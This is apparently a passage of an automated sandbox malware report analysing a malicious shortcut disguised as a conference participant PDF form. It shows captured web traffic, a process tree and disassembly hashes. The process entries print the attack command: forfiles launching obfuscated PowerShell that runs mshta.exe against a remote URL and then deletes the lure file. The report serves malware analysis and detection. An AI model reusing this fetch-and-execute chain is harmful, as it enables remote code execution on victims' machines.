                                                                                                                                                                                          2024-10-27 06:35:23 UTC891INData Raw: 6a 51 75 65 72 79 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 09 6a 51 75 65 72 79 28 20 22 2e 77 70 63 66 37 22 20 29 0d 0a 09 09 2e 6f 6e 28 20 27 77 70 63 66 37 6d 61 69 6c 73 65 6e 74 27 2c 20 66 75 6e 63 74 69 6f 6e 28 20 65 20 29 20 7b 0d 0a 09 09 09 76 61 72 20 67 74 6d 34 77 70 5f 63 66 37 66 6f 72 6d 69 64 20 3d 20 27 28 6e 6f 74 20 73 65 74 29 27 3b 0d 0a 09 09 09 69 66 20 28 20 65 20 26 26 20 65 2e 64 65 74 61 69 6c 20 26 26 20 65 2e 64 65 74 61 69 6c 2e 63 6f 6e 74 61 63 74 46 6f 72 6d 49 64 20 29 20 7b 0d 0a 09 09 09 09 67 74 6d 34 77 70 5f 63 66 37 66 6f 72 6d 69 64 20 3d 20 65 2e 64 65 74 61 69 6c 2e 63 6f 6e 74 61 63 74 46 6f 72 6d 49 64 3b 0d 0a 09 09 09 7d 20 65 6c 73 65 20 69 66 20 28 20 65 20 26 26 20 65 2e 6f 72 69 67 69 6e 61 6c
                                                                                                                                                                                          Data Ascii: jQuery( function() {jQuery( ".wpcf7" ).on( 'wpcf7mailsent', function( e ) {var gtm4wp_cf7formid = '(not set)';if ( e && e.detail && e.detail.contactFormId ) {gtm4wp_cf7formid = e.detail.contactFormId;} else if ( e && e.original


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          28192.168.2.461718185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:23 UTC465OUTGET /wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:23 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:23 GMT
                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                          Content-Length: 1969
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Fri, 16 Jul 2021 08:06:48 GMT
                                                                                                                                                                                          ETag: "60f13e18-7b1"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:23 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:23 UTC1969INData Raw: 2f 2a 20 67 6c 6f 62 61 6c 20 6a 51 75 65 72 79 2c 20 61 6a 61 78 75 72 6c 2c 20 77 64 72 5f 64 61 74 61 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 20 22 2e 61 77 64 72 5f 63 68 61 6e 67 65 5f 70 72 6f 64 75 63 74 22 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 72 6f 64 75 63 74 5f 69 64 20 3d 20 24 28 74 68 69 73 29 2e 61 74 74 72 28 27 64 61 74 61 2d 70 69 64 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 75 6c 65 5f 75 6e 69 71 75 65 5f 69 64 20 3d 20 24 28 74 68 69 73 29
                                                                                                                                                                                          Data Ascii: /* global jQuery, ajaxurl, wdr_data */(function ($) { $(document).ready(function () { $(document).on("click", ".awdr_change_product", function() { var product_id = $(this).attr('data-pid'); var rule_unique_id = $(this)


                                                                                                                                                                                          Statistics

                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Behavior

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:02:35:00
                                                                                                                                                                                          Start date:27/10/2024
                                                                                                                                                                                          Path:C:\Windows\System32\forfiles.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Windows\System32\forfiles.exe" /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg
                                                                                                                                                                                          Imagebase:0x7ff676d70000
                                                                                                                                                                                          File size:52'224 bytes
                                                                                                                                                                                          MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                          Start time:02:35:00
                                                                                                                                                                                          Start date:27/10/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                          Start time:02:35:00
                                                                                                                                                                                          Start date:27/10/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:. \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg
                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                          Start time:02:35:01
                                                                                                                                                                                          Start date:27/10/2024
                                                                                                                                                                                          Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Imagebase:0x7ff79f410000
                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                          Start time:02:35:19
                                                                                                                                                                                          Start date:27/10/2024
                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Disassembly

                                                                                                                                                                                          Reset < >

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 00007FFD9B952DF5 Relevance: .4, Instructions: 431COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1755814617.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffd9b950000_powershell.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ab396830de048e88941afaaee81c5dcecb433b31c684a464b5bd6b06ed737c4d
                                                                                                                                                                                            • Instruction ID: bcca46c1365f9fe326bec4129a6e72b239d068f2bb9152ccbbedc3a853561340
                                                                                                                                                                                            • Opcode Fuzzy Hash: ab396830de048e88941afaaee81c5dcecb433b31c684a464b5bd6b06ed737c4d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FD16432B1EB8D1FE7A5ABE848655B97BA1EF56310F1900FED84DC70E3DA18A905C311
                                                                                                                                                                                            Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1755480375.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                            • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                                                                                                                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 0000018408760FA9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.2955684044.0000018408760000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000018408760000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_18408760000_mshta.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                            • Instruction ID: 59001033a0f10e92c1c1d73377982983e04323795d053071d9072f89232c6a42
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8190021449580756E41421A10D452DD50406388250FD484905516A1189DC8D03A71252
                                                                                                                                                                                            Function 0000018408760FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.2955684044.0000018408760000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000018408760000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_18408760000_mshta.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                            • Instruction ID: 59001033a0f10e92c1c1d73377982983e04323795d053071d9072f89232c6a42
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8190021449580756E41421A10D452DD50406388250FD484905516A1189DC8D03A71252
                                                                                                                                                                                            Function 00000184079A0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.2954264900.00000184079A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000184079A0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_184079a0000_mshta.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                            • Instruction ID: abc7e8e7d639625ad6f6b430cc3e8ffcdd164ca9a452d55e37db5603917e96ec
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                            • Instruction Fuzzy Hash: C990021449640766E41451D50C862DD6040A388258FD484805516A0144EC4E03961293
                                                                                                                                                                                            Function 00000184079A0FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.2954264900.00000184079A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000184079A0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_184079a0000_mshta.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                            • Instruction ID: abc7e8e7d639625ad6f6b430cc3e8ffcdd164ca9a452d55e37db5603917e96ec
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                            • Instruction Fuzzy Hash: C990021449640766E41451D50C862DD6040A388258FD484805516A0144EC4E03961293